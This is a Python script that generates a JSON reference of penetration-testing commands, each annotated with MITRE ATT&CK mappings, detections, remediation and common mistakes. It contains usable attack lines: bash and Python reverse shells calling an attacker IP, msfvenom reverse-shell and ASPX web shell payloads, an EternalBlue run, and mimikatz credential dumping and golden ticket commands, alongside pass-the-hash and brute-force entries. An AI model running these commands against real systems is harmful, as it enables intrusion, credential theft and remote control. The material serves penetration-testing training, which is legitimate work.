#!/usr/bin/env python3
"""
Bulk VAPT Command Generator — produces 300+ additional commands.
Uses compact tuple format for efficiency, expands to full schema.
"""

import json
from pathlib import Path

OUTPUT_DIR = Path(__file__).parent.parent / "data" / "commands"
OUTPUT_DIR.mkdir(parents=True, exist_ok=True)


def e(id, tool, cat, phase, os, cmd, name, desc, args, output, use_case,
      prereqs, mitre, tactic, detections, remediation, mistakes, alts, refs, tags):
    """Create a command entry."""
    return {"id": id, "tool": tool, "category": cat, "phase": phase, "os": os,
            "command": cmd, "name": name, "description": desc, "arguments": args,
            "expected_output": output, "use_case": use_case, "prerequisites": prereqs,
            "mitre_mapping": mitre, "mitre_tactic": tactic, "detections": detections,
            "remediation": remediation, "common_mistakes": mistakes,
            "alternatives": alts, "references": refs, "tags": tags}

L = ["linux"]
LW = ["linux", "windows"]
LWM = ["linux", "windows", "macos"]

# ===================== RECONNAISSANCE (40 new) =====================
RECON = [
e("nmap-syn-scan","nmap","reconnaissance",1,LWM,"nmap -sS -p- -T4 <target>","SYN Scan All Ports","Half-open SYN scan on all 65535 ports with aggressive timing.",{"-sS":"SYN scan","-p-":"All ports","-T4":"Aggressive timing"},"PORT     STATE SERVICE\n22/tcp   open  ssh\n80/tcp   open  http\n3306/tcp open  mysql","Fast full port scan — default for most engagements.",["Root privileges"],["T1046"],"Discovery",["SYN flood detection","Sequential port access patterns"],["Host firewalls","IDS/IPS","Rate limiting"],["Not saving output (-oA)","Scanning without root"],["masscan","rustscan"],["https://nmap.org/book/man-port-scanning-techniques.html"],["syn","full-scan","tcp","ports"]),
e("nmap-version-intensity","nmap","reconnaissance",1,LWM,"nmap -sV --version-intensity 5 -p <ports> <target>","Version Detection (High Intensity)","Aggressive version probing — sends more probes for accurate identification.",{"-sV":"Version detection","--version-intensity 5":"Max probe level (0-9)"},"22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4","Identify exact service versions for exploit matching.",["Open ports known"],["T1046","T1592"],"Discovery",["Multiple service probes per port","Unusual banner grabbing"],["Minimize exposed services","Use non-standard banners"],["Using default intensity (misses some services)"],["nmap -sV --version-all (even more aggressive)"],["https://nmap.org/book/man-version-detection.html"],["version","service","identification","banner"]),
e("nmap-output-all","nmap","reconnaissance",1,LWM,"nmap -sV -sC -p- -oA scan_results <target>","Save Scan in All Formats","Saves output in normal, XML, and grepable formats for later analysis.",{"-oA":"Output all formats (creates .nmap, .xml, .gnmap)"},"Saved: scan_results.nmap, scan_results.xml, scan_results.gnmap","Always save scan results — needed for reporting and tool integration.",["Target accessible"],["T1046"],"Discovery",["N/A — output format only"],["N/A"],["Forgetting to save output","Not using XML for tool import"],["nmap -oX (XML only)","nmap -oG (grepable only)"],["https://nmap.org/book/man-output.html"],["output","save","xml","reporting"]),
e("nmap-decoy-scan","nmap","reconnaissance",1,L,"nmap -sS -D RND:5 <target>","Decoy Scan (IDS Evasion)","Sends packets from spoofed source IPs alongside real scan to confuse IDS.",{"-D RND:5":"Use 5 random decoy IPs","-sS":"SYN scan"},"Nmap scan report (with decoys active)","Evade IDS by making it harder to identify the real scanner.",["Root privileges","Understanding of target's IDS"],["T1046","T1205"],"Defense Evasion",["Multiple source IPs scanning same target","Decoy IP analysis"],["Stateful IDS","Source IP validation"],["Decoy IPs must be alive (or IDS ignores them)"],["nmap --source-port 53 (source port manipulation)"],["https://nmap.org/book/man-bypass-firewalls-ids.html"],["decoy","evasion","ids-bypass","stealth"]),
e("nmap-idle-scan","nmap","reconnaissance",1,L,"nmap -sI <zombie_ip> <target>","Idle/Zombie Scan","Completely blind scan using a zombie host — your IP never touches the target.",{"-sI":"Idle scan using zombie host","<zombie_ip>":"IP of idle host with predictable IP ID"},"PORT   STATE SERVICE\n80/tcp open  http (via zombie)","Ultimate stealth — target only sees traffic from the zombie, not you.",["Zombie host with predictable IP ID sequence","Root privileges"],["T1046","T1205"],"Defense Evasion",["Unusual traffic from zombie host","IP ID analysis"],["Randomize IP ID sequences","Monitor for idle scan patterns"],["Finding a suitable zombie (must have incremental IP IDs)"],["nmap -sS -D (decoy scan — easier)"],["https://nmap.org/book/idlescan.html"],["idle-scan","zombie","stealth","anonymous"]),
e("assetfinder-subdomains","assetfinder","reconnaissance",1,LWM,"assetfinder --subs-only <domain>","Quick Subdomain Discovery","Fast, simple subdomain finder using certificate transparency and other passive sources.",{"--subs-only":"Only output subdomains (not related domains)"},"api.target.com\ndev.target.com\nstaging.target.com","Fastest passive subdomain discovery — good for quick initial recon.",["Target domain"],["T1590"],"Reconnaissance",["Passive — no target interaction"],["Remove unused subdomains","Monitor CT logs"],["Not combining with other tools for completeness"],["subfinder","amass","findomain"],["https://github.com/tomnomnom/assetfinder"],["subdomain","passive","fast","ct-logs"]),
e("gau-urls","gau","reconnaissance",1,L,"gau <domain> | grep -E '\\.(php|asp|jsp|js)' | sort -u","Get All URLs (Historical)","Fetches known URLs from Wayback Machine, Common Crawl, and AlienVault OTX.",{"<domain>":"Target domain","grep":"Filter interesting extensions","sort -u":"Deduplicate"},"http://target.com/admin/config.php\nhttp://target.com/api/v1/users.js","Find historical endpoints, parameters, and forgotten files from web archives.",["Target domain","Internet access"],["T1596.003"],"Reconnaissance",["Passive — queries archives, not target"],["Remove old endpoints","Implement access controls"],["Not checking if URLs are still live (pipe to httpx)"],["waybackurls","katana (active crawler)"],["https://github.com/lc/gau"],["urls","historical","archive","passive","endpoints"]),
e("katana-crawl","katana","reconnaissance",1,L,"katana -u http://<target> -d 3 -jc -o urls.txt","Web Crawler (Active)","Actively crawls a website extracting URLs, JavaScript endpoints, and form actions.",{"-u":"Target URL","-d 3":"Crawl depth 3","-jc":"JavaScript crawling","-o":"Output file"},"http://target.com/api/v2/users\nhttp://target.com/admin/dashboard\nhttp://target.com/uploads/","Active crawling discovers endpoints that passive methods miss — especially JS-rendered content.",["Target web server accessible"],["T1595"],"Reconnaissance",["Crawler user-agent in logs","High request volume from single IP"],["Rate limiting","robots.txt (won't stop determined crawlers)"],["Not enabling JS crawling (-jc)","Setting depth too low"],["gospider","hakrawler","burp spider"],["https://github.com/projectdiscovery/katana"],["crawler","active","javascript","endpoints","spider"]),
e("testssl-scan","testssl","reconnaissance",1,L,"testssl.sh <target>:443","SSL/TLS Configuration Audit","Comprehensive SSL/TLS testing — checks protocols, ciphers, vulnerabilities (Heartbleed, POODLE, etc.).",{"<target>:443":"Target host and port"},"Testing protocols...\n SSLv3     not offered\n TLS 1.0   offered (deprecated)\n TLS 1.2   offered\n TLS 1.3   offered\nVulnerabilities:\n Heartbleed: not vulnerable\n POODLE:    VULNERABLE","Audit SSL/TLS configuration for weak protocols, ciphers, and known vulnerabilities.",["HTTPS service running"],["T1595","T1040"],"Reconnaissance",["SSL probe patterns in logs"],["Disable TLS 1.0/1.1","Use strong cipher suites","Enable HSTS"],["Not checking all ports with SSL","Missing client certificate issues"],["sslscan","nmap --script ssl-enum-ciphers","sslyze"],["https://testssl.sh"],["ssl","tls","certificate","vulnerability","crypto"]),
e("eyewitness-screenshot","eyewitness","reconnaissance",1,L,"eyewitness --web -f urls.txt --no-prompt -d screenshots/","Web Screenshot Capture","Takes screenshots of web pages from a URL list — visual identification of applications at scale.",{"--web":"Web mode","-f":"URL file","--no-prompt":"Non-interactive","-d":"Output directory"},"[*] Capturing: http://target.com → screenshot saved\n[*] Report generated: screenshots/report.html","Visually identify web applications across many hosts — faster than visiting each manually.",["URL list","Chrome/Chromium installed"],["T1595"],"Reconnaissance",["Multiple HTTP requests from single source"],["N/A — reconnaissance tool"],["Not reviewing all screenshots","Missing non-standard ports"],["gowitness","aquatone","webscreenshot"],["https://github.com/RedSiege/EyeWitness"],["screenshot","visual","web","identification","mass"]),
]

# ===================== ENUMERATION (30 new) =====================
ENUM = [
e("nmap-smb-shares","nmap","enumeration",2,LWM,"nmap --script smb-enum-shares,smb-ls -p 445 <target>","SMB Share Listing with Contents","Enumerates SMB shares AND lists files in accessible shares.",{"smb-enum-shares":"List shares","smb-ls":"List files in shares"},"| ADMIN$ - Remote Admin (NO ACCESS)\n| SharedDocs - (READ)\n|   backup.zip\n|   passwords.xlsx","Find readable shares and identify sensitive files without manual connection.",["SMB port 445 open"],["T1135","T1039"],"Discovery",["SMB enumeration in audit logs"],["Restrict share permissions","Remove sensitive files from shares"],["Not listing file contents"],["smbclient","smbmap -R"],["https://nmap.org/nsedoc/scripts/smb-enum-shares.html"],["smb","shares","files","enumeration"]),
e("enum4linux-ng","enum4linux-ng","enumeration",2,L,"enum4linux-ng -A <target>","Enum4linux-ng (Modern)","Python rewrite of enum4linux with better output formatting and additional checks.",{"-A":"All enumeration (users, shares, groups, policies, OS)"},"Users:\n  administrator (RID: 500)\n  guest (RID: 501)\nShares:\n  IPC$, ADMIN$, SharedDocs","Modern replacement for enum4linux — better parsing, JSON output, more reliable.",["SMB/RPC access"],["T1087","T1135"],"Discovery",["RPC enumeration calls","Multiple SMB queries"],["Disable null sessions","Restrict RPC access"],["Using old enum4linux instead of -ng"],["enum4linux","netexec --users"],["https://github.com/cddmp/enum4linux-ng"],["smb","enumeration","users","modern","python"]),
e("onesixtyone-snmp","onesixtyone","enumeration",2,L,"onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt <target>","SNMP Community String Brute-Force","Brute-forces SNMP community strings — finds non-default strings that reveal system info.",{"-c":"Community string wordlist","<target>":"Target IP"},"192.168.1.10 [backup] Linux server 5.4.0\n192.168.1.10 [internal] Hardware: x86","Discover non-default SNMP community strings that may expose sensitive system information.",["SNMP port 161/UDP open"],["T1046"],"Discovery",["Multiple SNMP auth failures","Brute-force patterns on port 161"],["Use SNMPv3","Change default community strings","Restrict SNMP access"],["Only trying 'public' and 'private'"],["snmpwalk","snmp-check"],["https://github.com/trailofbits/onesixtyone"],["snmp","brute-force","community-string","enumeration"]),
e("ldapdomaindump","ldapdomaindump","enumeration",2,L,"ldapdomaindump -u '<domain>\\<user>' -p '<pass>' <dc_ip>","LDAP Domain Dump","Dumps all AD objects (users, groups, computers, policies) via LDAP into HTML/JSON reports.",{"-u":"Domain\\username","-p":"Password","<dc_ip>":"Domain controller"},"[*] Dumping domain info...\n[+] domain_users.html\n[+] domain_groups.html\n[+] domain_computers.html","Get a complete picture of the AD environment — users, groups, computers, GPOs.",["Valid domain credentials","LDAP port 389 open"],["T1087.002","T1069.002"],"Discovery",["Large LDAP query volume","Enumeration of all objects"],["Restrict LDAP access","Monitor bulk queries"],["Not reviewing the HTML reports thoroughly"],["bloodhound-python","ldapsearch","windapsearch"],["https://github.com/dirkjanm/ldapdomaindump"],["ldap","domain","dump","users","groups","computers"]),
e("finger-enum","finger","enumeration",2,L,"finger @<target>","Finger User Enumeration","Queries the finger service (port 79) for logged-in users and user information.",{"@<target>":"Query all users on target"},"Login    Name         TTY  Idle  When\nroot     root         pts/0  1d  Mon 09:00\nadmin    Admin User   pts/1  2h  Mon 14:00","Enumerate users on systems running the finger daemon — rare but still found on legacy systems.",["Finger port 79 open"],["T1087"],"Discovery",["Finger queries in service logs"],["Disable finger service","Block port 79"],["Not checking if finger is running (rare service)"],["nmap --script finger","rusers"],["https://linux.die.net/man/1/finger"],["finger","users","legacy","enumeration"]),
e("ident-scan","ident-scan","enumeration",2,L,"nmap --script auth-owners -p <ports> <target>","Ident Service Enumeration","Queries the ident service (port 113) to identify which user owns each running service.",{"--script auth-owners":"Query ident for process owners"},"22/tcp open ssh    owner: root\n80/tcp open http   owner: www-data\n3306/tcp open mysql owner: mysql","Identify which user account runs each service — useful for targeting specific accounts.",["Ident port 113 open (rare)"],["T1087"],"Discovery",["Ident queries in logs"],["Disable ident service"],["Service rarely available on modern systems"],["nmap -sV (version detection shows some info)"],["https://nmap.org/nsedoc/scripts/auth-owners.html"],["ident","users","service-owner","enumeration"]),
e("redis-enum","redis-cli","enumeration",2,L,"redis-cli -h <target> INFO","Redis Enumeration","Connects to Redis and retrieves server information — often unauthenticated.",{"-h":"Target host","INFO":"Get server information"},"# Server\nredis_version:6.2.6\nos:Linux 5.4.0\n# Keyspace\ndb0:keys=1523","Check for unauthenticated Redis — can lead to RCE via config set or module loading.",["Redis port 6379 open","No authentication (common misconfiguration)"],["T1190"],"Initial Access",["Redis connection from unauthorized IP"],["Require authentication (requirepass)","Bind to localhost only","Disable dangerous commands"],["Not trying to write files (config set dir/dbfilename)"],["nmap --script redis-info"],["https://book.hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis"],["redis","database","unauthenticated","rce"]),
e("mysql-enum","mysql","enumeration",2,L,"mysql -h <target> -u root -p'' -e 'SELECT user,host FROM mysql.user;'","MySQL Enumeration","Connects to MySQL and enumerates users — tests for empty root password.",{"-h":"Target host","-u root":"Username","-p''":"Empty password","-e":"Execute query"},"user    host\nroot    localhost\nroot    %\nadmin   %","Check for MySQL with weak/empty credentials — common in development environments.",["MySQL port 3306 open","Weak or empty credentials"],["T1078"],"Initial Access",["Failed MySQL auth attempts","Successful auth from unusual IP"],["Set strong root password","Restrict remote root access","Use mysql_secure_installation"],["Not trying common passwords","Missing UDF for RCE"],["nmap --script mysql-enum","hydra mysql"],["https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql"],["mysql","database","credentials","enumeration"]),
]

# ===================== EXPLOITATION (25 new) =====================
EXPLOIT = [
e("msfconsole-eternalblue","metasploit","exploitation",5,L,"msfconsole -q -x 'use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS <target>; set LHOST <attacker>; exploit'","EternalBlue Exploit (MS17-010)","Exploits the SMBv1 vulnerability for remote code execution — one of the most impactful exploits ever.",{"use exploit/...":"Select module","RHOSTS":"Target","LHOST":"Attacker IP","exploit":"Run"},"[*] Sending exploit...\n[+] Meterpreter session 1 opened\nmeterpreter >","Exploit unpatched Windows systems via SMBv1 — gives SYSTEM shell directly.",["Target running unpatched Windows with SMBv1","Port 445 open"],["T1210"],"Lateral Movement",["SMB exploit signatures in IDS","Unusual SMB traffic patterns","Blue screen events"],["Patch MS17-010","Disable SMBv1","Block port 445 at perimeter"],["Target already patched","Wrong architecture payload"],["manual exploit scripts","netexec -M ms17-010 (check only)"],["https://docs.metasploit.com"],["eternalblue","ms17-010","smb","rce","critical"]),
e("msfvenom-linux-reverse","metasploit","exploitation",5,L,"msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=4444 -f elf -o shell.elf","Linux Reverse Shell Payload","Generates a Linux ELF binary that connects back to attacker with a shell.",{"-p linux/x64/shell_reverse_tcp":"Linux 64-bit reverse shell","LHOST":"Attacker IP","LPORT":"Port","-f elf":"ELF format","-o":"Output file"},"Payload size: 74 bytes\nSaved as: shell.elf","Create Linux payloads for delivery via file upload, cron job injection, or social engineering.",["Target is Linux x64","Listener ready"],["T1059"],"Execution",["Outbound connection to unusual port","New ELF execution"],["Application whitelisting","Egress filtering","EDR"],["Wrong architecture","Forgetting chmod +x"],["python reverse shell one-liner","bash -i >& /dev/tcp/ip/port 0>&1"],["https://docs.metasploit.com"],["payload","linux","reverse-shell","elf","generation"]),
e("msfvenom-aspx","metasploit","exploitation",5,L,"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f aspx -o shell.aspx","ASPX Web Shell Payload","Generates an ASPX web shell for upload to IIS/ASP.NET servers.",{"-f aspx":"ASPX format for IIS"},"Saved as: shell.aspx","Upload to IIS servers via file upload vulnerabilities to get code execution.",["IIS/ASP.NET target","File upload vulnerability"],["T1505.003"],"Persistence",["New ASPX file in web directory","Outbound connection from w3wp.exe"],["Restrict file uploads","Monitor web directories","Application whitelisting"],["Uploading to non-executable directory"],["aspx one-liner webshell","p0wny-shell"],["https://docs.metasploit.com"],["aspx","webshell","iis","upload","payload"]),
e("searchsploit-mirror","searchsploit","exploitation",5,L,"searchsploit -m <exploit_id>","Mirror Exploit to Current Directory","Copies an exploit from ExploitDB to your current working directory for modification.",{"-m":"Mirror (copy) exploit to current directory","<exploit_id>":"Exploit path from search results"},"Exploit: exploits/linux/remote/49757.py\nCopied to: /home/user/49757.py","Copy exploits locally to review, modify, and execute them.",["exploitdb installed","Exploit ID from search"],["T1190"],"Initial Access",["N/A — local file operation"],["Patch vulnerable services"],["Not reading the exploit code before running","Missing dependencies"],["git clone from exploit-db.com"],["https://www.exploit-db.com"],["exploitdb","mirror","copy","exploit","local"]),
e("python-http-server","python","exploitation",5,LWM,"python3 -m http.server 8080","Python HTTP Server (File Transfer)","Starts a simple HTTP server for transferring files to/from target machines.",{"-m http.server":"HTTP server module","8080":"Port number"},"Serving HTTP on 0.0.0.0 port 8080","Transfer tools, exploits, and payloads to compromised machines.",["Python installed on attacker"],["T1105"],"Command and Control",["HTTP download from unusual IP/port"],["Egress filtering","Monitor file downloads"],["Forgetting to serve from correct directory"],["python2 -m SimpleHTTPServer","php -S 0.0.0.0:8080","updog"],["https://docs.python.org/3/library/http.server.html"],["file-transfer","http","python","serving","tools"]),
e("curl-download","curl","exploitation",5,LWM,"curl http://<attacker>:8080/linpeas.sh -o /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh","Download Tool to Target","Downloads a file from attacker's HTTP server to the target machine.",{"-o":"Output filename","chmod +x":"Make executable"},"% Total  % Received\n100 800k  100 800k    0     0  10.0M      0 --:--:-- --:--:--","Transfer enumeration scripts and tools to compromised targets.",["Outbound HTTP from target","Attacker serving files"],["T1105"],"Command and Control",["HTTP download to /tmp","New executable in temp directories"],["Egress filtering","Monitor /tmp for new executables"],["Target can't reach attacker (use certutil on Windows)"],["wget","certutil (Windows)","powershell iwr"],["https://curl.se"],["download","transfer","curl","tools","target"]),
e("reverse-shell-bash","bash","exploitation",5,L,"bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1","Bash Reverse Shell","One-liner bash reverse shell — works on most Linux systems without additional tools.",{">& /dev/tcp/ip/port":"Redirect to TCP connection","0>&1":"Redirect stdin"},"$ whoami\nwww-data","Simplest reverse shell when bash is available — no tools needed on target.",["Bash available on target","Outbound TCP allowed"],["T1059.004"],"Execution",["Bash spawning network connection","Process tree: web → bash → /dev/tcp"],["Restrict outbound connections","Monitor process trees"],["/dev/tcp not available (use python/perl instead)","Firewall blocking outbound"],["python -c 'import socket...'","nc -e /bin/bash","perl reverse shell"],["https://www.revshells.com"],["reverse-shell","bash","one-liner","linux","basic"]),
e("reverse-shell-python","python","exploitation",5,LWM,"python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"<ip>\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'","Python Reverse Shell","Python one-liner reverse shell — works when bash /dev/tcp isn't available.",{"socket.socket()":"Create TCP socket","connect":"Connect to attacker","dup2":"Redirect stdin/stdout/stderr","subprocess.call":"Spawn shell"},"$ whoami\nwww-data","Alternative reverse shell when bash method fails — Python is common on Linux servers.",["Python installed on target"],["T1059.006"],"Execution",["Python spawning network connection","Unusual python process"],["Remove unnecessary Python installations","Monitor python execution"],["Wrong Python version (python vs python3)"],["bash reverse shell","perl reverse shell","php reverse shell"],["https://www.revshells.com"],["reverse-shell","python","one-liner","alternative"]),
e("shell-upgrade-pty","python","exploitation",5,L,"python3 -c 'import pty;pty.spawn(\"/bin/bash\")'\n# Then: Ctrl+Z\n# stty raw -echo; fg\n# export TERM=xterm","Upgrade to Full TTY Shell","Upgrades a basic reverse shell to a fully interactive TTY with tab completion and job control.",{"pty.spawn":"Spawn pseudo-terminal","stty raw -echo":"Pass raw input","export TERM":"Set terminal type"},"www-data@target:~$ (full interactive shell with tab completion)","Always upgrade shells — needed for su, sudo, vim, and other interactive commands.",["Basic reverse shell obtained"],["T1059"],"Execution",["N/A — post-exploitation activity"],["N/A"],["Forgetting Ctrl+Z step","Not exporting TERM"],["script /dev/null -c bash","rlwrap nc (on attacker side)"],["https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/"],["shell-upgrade","tty","interactive","pty","essential"]),
]

# ===================== POST-EXPLOITATION (25 new) =====================
POSTEX = [
e("mimikatz-sam","mimikatz","post_exploitation",6,["windows"],"mimikatz.exe \"privilege::debug\" \"lsadump::sam\" exit","Dump SAM Database","Extracts local account hashes from the SAM database.",{"lsadump::sam":"Dump SAM hashes"},"RID  : 000001f4 (500)\nUser : Administrator\nHash NTLM: fc525c9683e8fe067095ba2ddc971889","Get local account hashes for pass-the-hash or offline cracking.",["SYSTEM privileges"],["T1003.002"],"Credential Access",["SAM database access","Mimikatz signatures"],["Credential Guard","LAPS","Monitor SAM access"],["Not having SYSTEM (need privilege::debug first)"],["reg save HKLM\\SAM sam.bak (manual)","secretsdump"],["https://github.com/gentilkiwi/mimikatz"],["sam","local-hashes","ntlm","credentials"]),
e("mimikatz-tickets","mimikatz","post_exploitation",6,["windows"],"mimikatz.exe \"privilege::debug\" \"sekurlsa::tickets /export\" exit","Export Kerberos Tickets","Exports all Kerberos tickets from memory — TGTs and TGS tickets for reuse.",{"sekurlsa::tickets /export":"Export all tickets to .kirbi files"},"[*] Ticket exported: [0;3e7]-2-0-40e10000-Administrator@krbtgt-CORP.LOCAL.kirbi","Harvest Kerberos tickets for pass-the-ticket attacks or Golden Ticket creation.",["SYSTEM privileges","Domain-joined machine"],["T1558"],"Credential Access",["Kerberos ticket export events","Unusual .kirbi file creation"],["Protected Users group","Credential Guard"],["Not having sufficient privileges"],["Rubeus dump","klist (view only)"],["https://github.com/gentilkiwi/mimikatz"],["kerberos","tickets","tgt","pass-the-ticket"]),
e("mimikatz-golden-ticket","mimikatz","post_exploitation",6,["windows"],"mimikatz.exe \"kerberos::golden /user:Administrator /domain:corp.local /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ptt\"","Golden Ticket Attack","Creates a forged TGT valid for 10 years — complete domain compromise.",{"/user":"User to impersonate","/domain":"Domain name","/sid":"Domain SID","/krbtgt":"krbtgt NTLM hash","/ptt":"Pass the ticket (inject into memory)"},"[*] Golden ticket for 'Administrator @ corp.local' successfully submitted","Forge TGT to impersonate any user — requires krbtgt hash (from DCSync).",["krbtgt NTLM hash","Domain SID"],["T1558.001"],"Credential Access",["TGT with unusual lifetime","Kerberos anomalies"],["Reset krbtgt password twice","Monitor for forged tickets"],["Wrong SID or krbtgt hash","Not using /ptt"],["impacket-ticketer","Rubeus golden"],["https://attack.mitre.org/techniques/T1558/001/"],["golden-ticket","krbtgt","persistence","domain-admin"]),
e("chisel-port-forward","chisel","post_exploitation",6,LW,"# Server: chisel server -p 8080 --reverse\n# Client: chisel client <attacker>:8080 R:3306:127.0.0.1:3306","Port Forwarding (Chisel)","Forwards a specific port from the target's internal network to your machine.",{"R:3306:127.0.0.1:3306":"Forward target's local port 3306 to attacker's port 3306"},"server: session#1: tun0 (R:3306:127.0.0.1:3306)","Access internal services (databases, admin panels) that only listen on localhost.",["Chisel on both machines","Outbound connectivity from target"],["T1572"],"Command and Control",["HTTP tunnel traffic","Unusual outbound connections"],["Egress filtering","Monitor for tunneling"],["Wrong port direction","Firewall blocking"],["ssh -L (if SSH available)","socat"],["https://github.com/jpillora/chisel"],["port-forward","tunnel","internal","access"]),
e("ssh-tunnel-dynamic","ssh","post_exploitation",6,L,"ssh -D 9050 -N -f user@<pivot_host>","SSH Dynamic SOCKS Proxy","Creates a SOCKS proxy through an SSH connection for pivoting into internal networks.",{"-D 9050":"SOCKS proxy on port 9050","-N":"No command execution","-f":"Background"},"(runs in background, configure proxychains to use 127.0.0.1:9050)","Pivot through a compromised host with SSH access to reach internal networks.",["SSH access to pivot host","proxychains configured"],["T1572","T1090"],"Command and Control",["SSH connection from unusual source","SOCKS traffic patterns"],["Restrict SSH access","Monitor SSH sessions"],["Not configuring proxychains.conf","Wrong SOCKS port"],["chisel (no SSH needed)","ligolo-ng"],["https://linux.die.net/man/1/ssh"],["ssh","socks","proxy","pivoting","tunnel"]),
e("pth-winrm","evil-winrm","post_exploitation",6,L,"evil-winrm -i <target> -u Administrator -H <ntlm_hash>","Pass-the-Hash (WinRM)","Authenticates using NTLM hash instead of password — no need to crack the hash.",{"-H":"NTLM hash (pass-the-hash)"},"*Evil-WinRM* PS C:\\Users\\Administrator>","Use captured NTLM hashes directly for authentication without cracking.",["NTLM hash","WinRM port 5985 open","User in Remote Management Users"],["T1550.002"],"Lateral Movement",["NTLM auth with hash (Event 4624 type 3)","WinRM from unusual source"],["Disable NTLM where possible","Use Kerberos only","Monitor for PtH patterns"],["Hash format wrong (need NT hash only, not LM:NT)"],["impacket-psexec -hashes","impacket-wmiexec -hashes"],["https://github.com/Hackplayers/evil-winrm"],["pass-the-hash","ntlm","winrm","lateral-movement"]),
e("bloodhound-pathfind","bloodhound","post_exploitation",6,LW,"# In BloodHound GUI:\n# Right-click user → 'Shortest Path to Domain Admin'\n# Or: 'Find All Domain Admins' → 'Shortest Path from Owned Principals'","BloodHound Path Analysis","Uses BloodHound's graph database to find attack paths from current access to Domain Admin.",{"Shortest Path":"Find minimum hops to target","Owned Principals":"Mark compromised accounts"},"Path: user → GenericAll on Group → Group has AdminTo → Server → DCSync rights","Identify the shortest attack path from your current access to domain compromise.",["BloodHound data collected","Neo4j + BloodHound GUI running"],["T1069","T1087"],"Discovery",["N/A — offline analysis tool"],["Fix ACL misconfigurations","Remove unnecessary admin paths","Implement tiered administration"],["Not marking owned principals","Missing custom queries"],["SharpHound (collect)","PlumHound (reporting)"],["https://bloodhound.specterops.io"],["attack-path","graph","domain-admin","acl","analysis"]),
e("crackmapexec-dump","netexec","post_exploitation",6,L,"netexec smb <target> -u admin -p pass --sam","Dump SAM via NetExec","Remotely dumps SAM database hashes from a target using admin credentials.",{"--sam":"Dump SAM hashes remotely"},"SMB  10.0.0.10  445  PC01  [+] Dumping SAM hashes\nSMB  10.0.0.10  445  PC01  Administrator:500:aad3b435...:fc525c96...:::","Remotely extract local account hashes without needing to be on the target.",["Admin credentials","SMB access"],["T1003.002"],"Credential Access",["Remote SAM access events","Admin share access"],["LAPS","Restrict admin shares","Monitor remote SAM access"],["Not having local admin rights"],["impacket-secretsdump","reg save (local)"],["https://github.com/Pennyw0rth/NetExec"],["sam","remote","dump","credentials","netexec"]),
]

# ===================== PASSWORD ATTACKS (15 new) =====================
PASSWD = [
e("hashcat-kerberoast","hashcat","password_attacks",6,LW,"hashcat -m 13100 tgs_hashes.txt /usr/share/wordlists/rockyou.txt -r best64.rule","Crack Kerberoast Hashes","Cracks TGS-REP hashes from Kerberoasting attacks. Mode 13100.",{"-m 13100":"Kerberos 5 TGS-REP","-r best64.rule":"Mutation rules"},"$krb5tgs$23$*svc_sql...:Password1!\nStatus: Cracked","Crack service account passwords obtained via Kerberoasting.",["TGS hashes from GetUserSPNs","Wordlist + rules"],["T1110.002"],"Credential Access",["N/A — offline"],["Strong service account passwords (25+ chars)","Use gMSA","AES encryption"],["Wrong hash mode","Not using rules"],["john --format=krb5tgs"],["https://hashcat.net/wiki/doku.php?id=example_hashes"],["kerberoast","tgs","cracking","service-account"]),
e("hashcat-asrep","hashcat","password_attacks",6,LW,"hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt","Crack AS-REP Hashes","Cracks AS-REP hashes from AS-REP Roasting. Mode 18200.",{"-m 18200":"Kerberos 5 AS-REP"},"$krb5asrep$23$svc_backup...:Welcome1\nStatus: Cracked","Crack hashes from accounts without pre-authentication.",["AS-REP hashes from GetNPUsers"],["T1110.002"],"Credential Access",["N/A — offline"],["Enable pre-auth on all accounts","Strong passwords"],["Wrong mode (18200 not 13100)"],["john --format=krb5asrep"],["https://hashcat.net/wiki"],["asrep","cracking","pre-auth","kerberos"]),
e("hashcat-wpa","hashcat","password_attacks",6,LW,"hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt","Crack WPA/WPA2 Handshake","Cracks captured WPA/WPA2 handshakes. Mode 22000 (PMKID/EAPOL).",{"-m 22000":"WPA-PBKDF2-PMKID+EAPOL"},"Network: CorpWiFi\nPassword: Summer2024!\nStatus: Cracked","Crack WiFi passwords from captured handshakes.",["Captured handshake (.hc22000 format)","Wordlist"],["T1110.002"],"Credential Access",["N/A — offline"],["Strong WiFi passwords (15+ chars)","Use WPA3","802.1X enterprise"],["Wrong capture format","Not converting from .cap"],["aircrack-ng","john"],["https://hashcat.net/wiki"],["wpa","wifi","handshake","wireless","cracking"]),
e("hydra-rdp","hydra","password_attacks",5,L,"hydra -l administrator -P passwords.txt rdp://<target> -t 1","RDP Brute-Force","Brute-forces RDP login — use single thread to avoid lockout.",{"-l":"Username","-P":"Password list","rdp://":"Protocol","-t 1":"Single thread (avoid lockout)"},"[3389][rdp] host: 10.0.0.10 login: administrator password: P@ssw0rd","Brute-force RDP when you have a username but not the password.",["RDP port 3389 open","No account lockout or NLA"],["T1110.001"],"Credential Access",["Multiple failed RDP logins (Event 4625)","Account lockout events"],["NLA (Network Level Authentication)","Account lockout","MFA for RDP"],["Too many threads (lockout)","NLA blocking attempts"],["netexec rdp","crowbar"],["https://github.com/vanhauser-thc/thc-hydra"],["rdp","brute-force","remote-desktop","credentials"]),
